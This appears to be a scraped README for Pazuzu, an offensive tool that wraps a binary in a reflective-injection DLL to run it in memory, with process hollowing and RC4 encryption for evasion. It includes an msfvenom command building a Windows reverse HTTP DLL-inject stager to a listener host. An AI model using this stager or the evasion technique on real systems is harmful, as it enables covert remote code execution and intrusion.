Home

Awesome

Pazuzu

Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.

For example, if you want to exploit a vulnerability and run your own executable instead of a third party reflective DLL. In this case you just have to choose the stager you like (reverse TCP, HTTP, HTTPS, etc.) and set the DLL generated by Pazuzu. Pazuzu will execute the binary within the address space of the vulnerable process as long as it has the .reloc section.

Alt text

Restrictions

How-to

Examples

root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 908 bytes
Saved as: Winhttp-stager.exe

Let's run Pazuzu.py with the regshot.exe binary (.section present):

Alt text

Let's run it now with the verbose option to see more detailed information:

Alt text

In the next example I use putty.exe which has no reloc section. I have chosen the system binary "c:\windows\write.exe" (option -k) to be "hollowed out" and I have encrypted the binary section with RC4 (option -x). The hidden option -m just run msfvenom with a winhttp dllinject stager.

Alt text

Here the Process Explorer output:

Alt text

Video

Disclaimer